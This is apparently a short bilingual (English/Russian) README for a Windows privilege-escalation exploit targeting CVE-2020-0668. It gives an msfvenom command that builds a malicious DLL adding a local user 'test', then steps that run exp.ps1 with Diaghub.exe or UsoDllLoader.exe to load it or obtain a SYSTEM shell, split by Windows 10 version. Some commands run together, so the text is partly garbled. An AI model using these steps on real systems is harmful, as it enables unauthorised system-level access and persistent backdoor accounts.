
Make CVE-2020-0668 exploit work for version < win10 v1903 and version >= win10 v1903
Сделать эксплойт CVE-2020-0668 рабочим для версии < win10 v1903 и версии >= win10 v1903
powershell эксплойт работает на версии < win10 v1903 с Diaghub.
evil.dll с помощью msfvenom
msfvenom -p windows/x64/exec CMD="net user test test /add" -f dll > evil.dllexp.ps1 в powershellDiaghub.exe C:\ProgramData evil.dll для загрузки dll и добавления пользователя.
powershell эксплойт работает на версии >= win10 v1903 с UsoDllLoader.
exp.ps1 в powershellUsoDllLoader.exe для получения системной оболочки
Версия x86 SysTracingPoc для issue,эксплойт работает на версии >= win10 v1903 из-за UsoLoadDll.
PoC на .net. Если вы посмотрите на C:\Windows\System32\evil.dll и переименуете его в evil.txt.
Вы обнаружите, что это не dll-файл. В нем только журнал трассировки.
PoC на powershell. Также только журнал трассировки в evil.dll.